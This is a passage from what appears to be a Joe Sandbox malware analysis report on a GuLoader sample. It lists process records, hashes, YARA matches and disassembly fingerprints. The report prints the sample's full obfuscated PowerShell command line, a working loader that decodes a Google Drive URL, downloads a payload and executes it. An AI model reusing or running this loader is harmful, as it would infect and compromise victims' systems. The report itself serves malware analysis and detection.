(Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
                                Imagebase:0x7ff788560000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1879470181.000001CA5698E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:04:02:46
                                Start date:30/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:3
                                Start time:04:02:58
                                Start date:30/09/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Frijsenborg Amateurism Knallertfreren Unplaiting #>;$Uniformsfrakke='tingene';<#Gaffelens Slgtsarv kommunevalgene Catalufas kalkeringens Skibsreders Pyrolysevrk #>;$Soundly=$host.PrivateData;If ($Soundly) {$Realters++;}function Burnets254($Sewings){$Noncataclysmic=$Bronzedren+$Sewings.Length-$Realters;for( $Hulede=5;$Hulede -lt $Noncataclysmic;$Hulede+=6){$Extratropical+=$Sewings[$Hulede];}$Extratropical;}function Iba($Charbroiled){ . ($Beslaglgning) ($Charbroiled);}$Aarendes=Burnets254 'SelvpMKapnioBeg az OpsaiThymylT.anslG anua Prim/Klyng5 Penu.Musta0perin Sch,o(EmbadWGldssiHaulanAns.ndStavnoMa wawTaaresoverf BaptNUbiquT rem Borg 1Uncon0Choko. dlis0Viktu;Nonvo ,spsWNussei aboonDob e6 vine4Un.ro;.erag SkamfxDrill6reuss4Natur;T.ght Hathr DousvCroqu:bouc 1Snapd2Byg.e1Lremi.Krens0Truck)Unort KarmiGOtt,keDezinco ergkStuttoEnera/ Fast2 Tryk0Slutv1N hed0F,dig0En er1Z osp0Mu.kl1Ir tt GuiluFFodgniRaulirAfooteOversfT lukosengexSprin/ Pref1 ille2R.fer1 Shar.Disap0 Inqu ';$Roskilde190=Burnets254 'confeuIntersChunkE SecorAab n-Mist aKalvegdahabeCohobNUnsetTFremt ';$Hyetograph=Burnets254 'AfkrihAdfrdtBugmutSnivepFri as,onst:Subve/Jagtl/ munddUsk,er R iniAm invBorsye onn.SlidsgToupeo Hyp oEnsilgChoralfr dleRecha.Proloc Bryso FiskmAbild/ FootuInorgcRosel?No,paeVocabx S ifpglo toHazierDiurnt ider=Ph lodpjathoBasiswRetennSlavilC,nopoUndgaaBalerdI gro& orfiStv,odSnitm= Lich1SkirpnBaadeqRedecj SagnXUnan M Hid.k CounuNidsty Sade0K,onjHNonsyQAnathzLegitkEurop_camoui,uttrG SepacBerkeo efirA E nsJAfkorbStineDAntisrSkrivbArchlsEstraZkjersjForreA SkrivSkrm x Kl eABunkrb Find ';$Kiasmers=Burnets254 'za fr>Styrt ';$Beslaglgning=Burnets254 'BoersI rdelEPraesXOv rv ';$Skibssidernes='Snarligt';$Rettelsesblad='\Assimileringens.Lan';Iba (Burnets254 ' earj$antihg konnlSkoleoG umpb Lycta Owenl Fnbl:MordaCLogiey .omblMylodiSugiln FraudLoadaeLakserpedeseSort r Bill=Nonsp$ AktieNephrn EkskvUa hn:Prluda Fs,epD,onqp,nobbdP.lsya yclotSammeaDipso+ arch$DatabR VinteElatet L,vetGlanse.yperlUnsucsFortreOveresMaelsbDesealCatalaHerhjdNonin ');Iba (Burnets254 ' lapp$SpinkgTvi llMediaoHe.heb.elesaHema lBeful:App eSIn.alc nurrrBrn pasketcwBetjelpremysak de=Mglin$ FradH U fryR,cureFla rtBursio llesgarve,rpseudaU.ennpSuverhBundv.KukkesP.melpSkulel KnusiSpanktAnari( obbl$FagblK Udebi,ingia F easBrovtmYmeree L ver angrsFrimu) M,cu ');Iba (Burnets254 'T erm[ D,agNSpr,ne ProbtSil c. nyprS Aq.aeSpi sr UnonvCor ciRa lecSubureD.belPN.ntao AlsmiTyrannTechntArranMBiltyaOvermnDobbeaDialogAnk eetricor Pinc] Nonc: .orr:a.kanSabonneTvangcPjas.uphtharMo tgi RrsmtNetvryun.ncPpicadrBarbaoinarctUnveroBrodechovedoUagtsl Per, de sk=Moder Bokma[uds aNRunkeeUnlyrtRe ak.Korr.Satione ubinc SexiuSlappr imbeiU diatArbejyHay.yPTilslrurt ko Tildt estaoUndutcAneu oEledol Per,TAut,syL.ttep Vipsesyned]Sjusk:Lodd.:.nsisT ymbilIkrafsCy,li1Trkni2 Dato ');$Hyetograph=$Scrawls[0];$Brnevold=(Burnets254 'Shudd$PrdikGEkspelSha eO Overb V nsaCoreglHande:Hvid i Um,dDAircoEAndvaOunderGFloppEPallbnAffejO Met UModulSL.ngw=DrikknPassaEHyperwSygel- OuncoTeglsb ,oguJP,ddeeSi icC odfuTSamme HistoSDr,geYUn elSStanitSte.seDav dmS ipj. DugpnElutrePoultTBilet.Ei htw He lEinchwb V,edcBedraLFiskeIArbejEMiljbNForskTHavre ');Iba ($Brnevold);Iba (Burnets254 'Jaege$Brugei BlsedUgeskeWeakeo tunng For eStvdrnProgroRadiuuJoyf sFster.CountH PinoeForziaOc,ondOpholeS ibsr Wa.nsLokal[ Ande$.viboRExteno StylsKarrykStyrgiAllerlResp.dUnchueNonre1Pukke9Bromi0P ten] Nonp= n nt$SynodAKri eaGigsfrSphaceBl sdnF,rbrdPandeeK,ritsD,kim ');$Stryges88=Burnets254 'Mowss$Miljtibre.fdC ckneSavelo R megBesagePu arnTacitoAutoruInexps Mand. to,aD OffeoDo.erwExtranSubmulTriamoDefeaaLiveddMiljbF CoeliVestelLa yve Seig(Bisul$Ri.hsHTelefy arebePatrit TurdoSystegD lprrMiliea rystpTigerhEspio,,tart$ ref PHastir TeddoFe.itxSkreseforl,n rbejeEuroetBervi) Sen ';$Proxenet=$Cylinderer;Iba (Burnets254 'Sodav$RecidGSpiflL S emOMlke.BT turaStroslRecir:AbstaA OverBFuddlYTuggeEbe ludPreha=Depor(TudseTBevgeEDispls,hototL tes-Badebp BeleAAdju tB topHJomfr Kvkk$ thypHero,R HaemOLavenX U reETimetNCoinseExcurt,atro)Filmn ');while (!$Abyed) {Iba (Burnets254 'Tangf$Pres.gPouchlGo,ifoPacifbProctaLumbrlMedia:DecalPRemicofunb,sForuriObovatC sariC.lluvEksisiChlo.sSlovetforeteArchinMarat=,emat$ ArmotTubberNonbiu RobieAot a ') ;Iba $Stryges88;Iba (Burnets254 ',adanSCollit Ariza AnelrSkruet Selv- KlbeS ndelHemateAndroeFri zpBukke Recr.4partr ');Iba (Burnets254 'Am.er$Gingeg U.gllBrddeoGarsibDisenaKonfolBogbr:Be.fiA DigibTittiyPrepaeEnd sdGenea=Pry,l(RosewT Phote abylsPhilotRdhov-BotanPVagtfa hirotDeli hI dst Downt$ uperPHemmerProp.oRevacxInstreBehann Ele.e SolatForhe)G ave ') ;Iba (Burnets254 'E,poi$OphavgUnheslDelkaoYokonbPerboa Oc.olSlem.:MikroRRollobCongrdT knoiGold.gHamatePilgrrPit ie fort= p us$TriumgFuglelpe ecoFofarbUndisa U,drlDefla:PuddlCBefolyfin,esSurtatZidaloI.dbls Mis.pAlarmaMbelfs apsom ,lou+Melod+folke% Cz.r$UnthiS P,ricSolarrBas.saAntndwLikablSwervsTaeni.Farvec eproFringuRegdnn Paratforl ') ;$Hyetograph=$Scrawls[$Rbdigere];}$Bemandingers=312136;$Baksningens=32559;Iba (Burnets254 'Brief$Aalekg rogrl FremoLaconb Embuatnde l Mill: MillKOffeniEncrimBenz ewoollrSuperiSi,ped evisg SnoriSkossa lokhnkaosj Fe.b=Tilk ChadaGKolo eTrskrtStbef-interCN umdoKnortnFo.tst,trigeHanken Unsat lith Bo il$Disp,PSaesorSneenoRe oixDayfleDisrunKetokeMaaletS,lla ');Iba (Burnets254 ' Skul$Rull.gFarvelUnu.toAuxocbV.redaKnsobl life:BouzoPMgt.grCentroHa ild Tan,uJunkikSporottypehu ForudForu v BesriRoyalkTilsjlRepute tarerDete.eSheetsSvige Shang=Auk i Repl[DuettSSno,byTllins rmout onteeOutpumHaveb. ryskCUdlgsoKamutndispovregreeMatchrEnsnatAlca ]Sudan:Slave:EjendFstaldr Incro estmLutetB utreaPenros UndeeCar,t6Pneum4 ljeS eptatPhymarEk.triBrevsn Pol,gSkvis(Ultim$StoreKTorskiNintum ilepe BalarD.triiBortrd SyrugSysteivizieaRensknBe be)Daudk ');Iba (Burnets254 'Tyros$ Agg g Ove l folkoTempobBarcoa UdsplProt : SkjtPNonineTranspHepatp RefleBasiarPentiwPauseoD rerrUdblstNort 4 G,nm Blost=Mul,i G,ne[GnallSPrin yPseudsGlycatplanteK,ttam Dio,.RadioTEklekeUn eaxRundetHuave.Drik.EAbbrenUdgancinagiopatacdAflevi StuvnK,nvegHasta] Slae: hitf:SivskA Min SProstCMurchIPaileIGlyco.nonheGTroldeDrilltOrthoSca,ast .litr FastiCeyl nRangfg egni(E,mer$DevilPNabo.rT areoS bcadpyramu Batik Applt Cragu Uno dl.rmev InfoiBantukforstlWaddieAtombrPyromeRestasAtte )Uraci ');Iba (Burnets254 ' Pryi$Fl.rigLin.elfatt.oS degbKombiaParoclSorbo:RegisS.rundcstemmrD tapu Tr,pt BegyaArthrtStrk oBegynrImput=under$Fe,emPDia.ee engpMedicpD,aloeNudamrJapanw.ayero,psolr Ballt .age4 abom. MellsBasinuInvalbTegnesMonottR adirSliveiBo genForskgSpec,(Pre o$SokleB Monoe UncamS natahemitn Besod FiltiD,zennHuskigImplue .ingr TrylsOccas,Sesq $ Bej.BP,agoaAnomakKumy,sVela,nLdig iKa minT ssagDivereTrldonKya,nsF,ott)Omreg ');Iba $Scrutator;"
                                Imagebase:0xb50000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2713834484.0000000008BE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2700448526.0000000005FEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2714081528.000000000BE9C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:04:02:58
                                Start date:30/09/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7699e0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                General

                                Target ID:8
                                Start time:04:03:19
                                Start date:30/09/2024
                                Path:C:\Windows\SysWOW64\msiexec.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\syswow64\msiexec.exe"
                                Imagebase:0x9c0000
                                File size:59'904 bytes
                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false

                                Disassembly

                                Reset < >

                                  Executed Functions

                                  Function 00007FFD9B9FB2EE Relevance: .4, Instructions: 399COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3f027beb02b37bce9c2f67e712c2764dd6a1cfa264b8f3dbd3efa745b688093
                                  • Instruction ID: 571c9c0f2b6eb7938226bbbfa3b0d00028e2319d7d681c3fff87c5dbf59eb7e5
                                  • Opcode Fuzzy Hash: e3f027beb02b37bce9c2f67e712c2764dd6a1cfa264b8f3dbd3efa745b688093
                                  • Instruction Fuzzy Hash: E8D17430B19A4E8FEBA8DF28C8557E97BD1FF58310F14426AE81EC7295CF7499448B81
                                  Function 00007FFD9B9FC09E Relevance: .4, Instructions: 382COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea81b0a4c5f12c66fdf9125a58fadfc8d815aa7b5b5ec39e2b978b9e0470707c
                                  • Instruction ID: 9d5ac2436db6813067ab699c25ffd42c87a484731cffd177e9cb32c368e5d2cc
                                  • Opcode Fuzzy Hash: ea81b0a4c5f12c66fdf9125a58fadfc8d815aa7b5b5ec39e2b978b9e0470707c
                                  • Instruction Fuzzy Hash: EDD17330B19A4E8FEBA8DF68C8657E977E1FB58311F14822AD80DC7295CF7499448B81
                                  Function 00007FFD9BAC7276 Relevance: .8, Instructions: 848COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 152b3bb8c6647e1ed8fedd87b8502740be8a27d540aac9985034333e98d3487f
                                  • Instruction ID: 2ff81a1c3fda4765df609eddf9ebfa7f4fd004578a24df4e48a33b269e7f9bfd
                                  • Opcode Fuzzy Hash: 152b3bb8c6647e1ed8fedd87b8502740be8a27d540aac9985034333e98d3487f
                                  • Instruction Fuzzy Hash: F7324732B0EA8D0FE7A5AB6848655B47BD1EF96310B1A01FFD44DC71A3DE59AC06C381
                                  Function 00007FFD9BAC8962 Relevance: .8, Instructions: 844COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f28293dc7f6874a2f7be30b17e2018f10dcf314d942e1e4982f91386c7fed239
                                  • Instruction ID: f2c24ca700c790cb47baa8cfc48af4bb665840da0d1fd9b83b71bb6355cd61bc
                                  • Opcode Fuzzy Hash: f28293dc7f6874a2f7be30b17e2018f10dcf314d942e1e4982f91386c7fed239
                                  • Instruction Fuzzy Hash: A6522532A0EBC90FE766A76848655747FE1EF53224B1E01FEC098CB1E3DA59AC45C352
                                  Function 00007FFD9BAC44A4 Relevance: .5, Instructions: 471COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dcf38ff47d2e90bdda7d04c6815d68c5542435b7b4ebb4bb47ca407ace46cb86
                                  • Instruction ID: 85e7b8daadd6e0fc75b5eba1663019a27b80cbc63c36e4b5e35fc9813a84a97a
                                  • Opcode Fuzzy Hash: dcf38ff47d2e90bdda7d04c6815d68c5542435b7b4ebb4bb47ca407ace46cb86
                                  • Instruction Fuzzy Hash: D2D12622B0FA8E0FE7BAA76858755B43BD1EF52210B0A00BED49DC71F3DD59AC058345
                                  Function 00007FFD9BACA10F Relevance: .5, Instructions: 456COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 52c5e99e663401d4f464d28c3cb9265cf2256305f052cf5ce6e61a6ab9c34acb
                                  • Instruction ID: e35d5c7f229cde450edc5adc180a0795b7d044ba8054f7d30208f4782273a9ab
                                  • Opcode Fuzzy Hash: 52c5e99e663401d4f464d28c3cb9265cf2256305f052cf5ce6e61a6ab9c34acb
                                  • Instruction Fuzzy Hash: F3E15832B0EA8D0FEBA5EB68886517877E1EF95210F1901FED05DC71E7DE29AC458341
                                  Function 00007FFD9BACA119 Relevance: .4, Instructions: 425COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61b024e1920ce90c51b9961e4c373e524ee7b2fdc1bbddd7b286446517d8f1d7
                                  • Instruction ID: 8f3da8e6d8f5e475c5dca8653fa7da053c1ceb4b044d2941278f640d09bbe0cd
                                  • Opcode Fuzzy Hash: 61b024e1920ce90c51b9961e4c373e524ee7b2fdc1bbddd7b286446517d8f1d7
                                  • Instruction Fuzzy Hash: E1E12932A0EBCD0FE7A5AB6888652747BE1EF56210F1901FED09DC71E7DE296C458342
                                  Function 00007FFD9BAC8CB8 Relevance: .4, Instructions: 413COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3cc8c552862e15672db08019cdb7b32918162b9f573166d629f2fec72b0f2f3
                                  • Instruction ID: eed4a22465f569c131c76ae873122b7cbbe8e6a2a029dd8c5c5da22fa64aae80
                                  • Opcode Fuzzy Hash: f3cc8c552862e15672db08019cdb7b32918162b9f573166d629f2fec72b0f2f3
                                  • Instruction Fuzzy Hash: 9DD13932B0EB890FE7A6AB6848651747BE1FF56220F1901FED05DC71E3DE29AD458342
                                  Function 00007FFD9BAC544C Relevance: .3, Instructions: 341COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 630e91d82fddf3768121776d6d7afc6d8f9d2d48dfb85b338c254a57d395df02
                                  • Instruction ID: 32cf315c863f64cac9b79a5e11a58b3432be64758127395c21872488ab7266b4
                                  • Opcode Fuzzy Hash: 630e91d82fddf3768121776d6d7afc6d8f9d2d48dfb85b338c254a57d395df02
                                  • Instruction Fuzzy Hash: B0A12732B1EA8D0FEBA5E76C9C666B97BD1EF55210B0901BBE45DC71E3DD18AC048341
                                  Function 00007FFD9BAC9469 Relevance: .3, Instructions: 319COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecabf411606b50590199d37e970d37be055f77f329dfa766749a58cc5862b830
                                  • Instruction ID: b1a7d45d92a5c9868fda304611d29bcc0f701f0aaa77975934374430d4f05151
                                  • Opcode Fuzzy Hash: ecabf411606b50590199d37e970d37be055f77f329dfa766749a58cc5862b830
                                  • Instruction Fuzzy Hash: F6915822B0FA8D0FEBA6EB6954685B47BD1EF56210B0A01FBC44DCB1E3DE59AD05C341
                                  Function 00007FFD9B9FBCAE Relevance: .3, Instructions: 258COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889184103.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9b9f0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f384bb5b9964081580e5b13fcadb0001c11ce1253909c60b058812c27461432a
                                  • Instruction ID: edf488dcbfb855fb128759d15717dd6516f5f59b3931c16dded632fa24a297a7
                                  • Opcode Fuzzy Hash: f384bb5b9964081580e5b13fcadb0001c11ce1253909c60b058812c27461432a
                                  • Instruction Fuzzy Hash: E3917370718A4D8FDBA8EF28C4557E93BE1FF58310F15826EE84EC7295CE7499448B82
                                  Function 00007FFD9BAC89E4 Relevance: .2, Instructions: 249COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5511e6e3a202015c8e64f4ce540f0dcd0d544d1b0dc24e949cc3ea6c2f26d2e0
                                  • Instruction ID: 1f44485e577bc56953b313b6bed939957665a5076e47ac0b5c82784f08f7a0bb
                                  • Opcode Fuzzy Hash: 5511e6e3a202015c8e64f4ce540f0dcd0d544d1b0dc24e949cc3ea6c2f26d2e0
                                  • Instruction Fuzzy Hash: D0916A6190F7C64FE327A77448756647FA0AF13264B1E02EAC4D8CB1F3D99D6859C322
                                  Function 00007FFD9BAC76BA Relevance: .2, Instructions: 215COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb6bc6506301322db75818973b96999f5f5494a8eb36f6f43483984f979453c1
                                  • Instruction ID: 2a1d6fcdc1f1540d817b906475db28e9512ef2c74ea0b6ba74f8b1d87b923187
                                  • Opcode Fuzzy Hash: cb6bc6506301322db75818973b96999f5f5494a8eb36f6f43483984f979453c1
                                  • Instruction Fuzzy Hash: 19512931B0EA4E0FE7AAAB7C48211747BD1EF91310B1601FAD44DC75A3DE55AC458381
                                  Function 00007FFD9BAC9E2A Relevance: .2, Instructions: 207COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bdeb9f57cc5cb35c343d76659aea5527751c668f294c6608428fa576280df1b
                                  • Instruction ID: 6b1c155025ef4b69ba5a3a747bde73b162889af66aa2f2d2e5b590459657daea
                                  • Opcode Fuzzy Hash: 2bdeb9f57cc5cb35c343d76659aea5527751c668f294c6608428fa576280df1b
                                  • Instruction Fuzzy Hash: 2F510722B0E6894FEB63E7A998655B47BE0EF52220B0900FBC05CC71E3DE59A9458391
                                  Function 00007FFD9BAC7749 Relevance: .2, Instructions: 192COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c15c59afaaca1c82685d0166462368ea0330911f05535213f00910608faeeb6
                                  • Instruction ID: 05279af6441cbb457aa6f162f47d34990db0c89ec261bf1dc35ca41e609b22d5
                                  • Opcode Fuzzy Hash: 6c15c59afaaca1c82685d0166462368ea0330911f05535213f00910608faeeb6
                                  • Instruction Fuzzy Hash: 80511822F1FA4E0FEBB6ABA848715747BD1EF51210B5A00BAC45DC31E2DD59ED458381
                                  Function 00007FFD9BAC9E67 Relevance: .1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c60d1bbf7644c765a6ebcd88099877d72f8fc331a227c19e3a7d2d210cc8485b
                                  • Instruction ID: 6194c6802509b3230652e0fdd04031cd23ec4101fa7d069025b85a7db4141c5c
                                  • Opcode Fuzzy Hash: c60d1bbf7644c765a6ebcd88099877d72f8fc331a227c19e3a7d2d210cc8485b
                                  • Instruction Fuzzy Hash: 9041A321A0EBC94FEB63EBA948655647FB0EF57210B0A00EBD488CB1E3D9596D49C352
                                  Function 00007FFD9BAC9669 Relevance: .1, Instructions: 127COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d67a6039d32ee4500733b41d497d4f79d72fe2430a9be3eb781b9c8d7897f731
                                  • Instruction ID: 1944b364a47e229a489e88d018d07c8531daa3dc5249718eceb302063df88879
                                  • Opcode Fuzzy Hash: d67a6039d32ee4500733b41d497d4f79d72fe2430a9be3eb781b9c8d7897f731
                                  • Instruction Fuzzy Hash: B1418421A0FBC94FEB62AB6948695747FE0EF57210B4A00EBD498CB1E3D9596D45C301
                                  Function 00007FFD9BAC5542 Relevance: .1, Instructions: 108COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1889667625.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffd9bac0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e160ce8cfb3151b5ab4a2e26fc416572dfd9223045b1ded1212c5f2ed3ddc1a
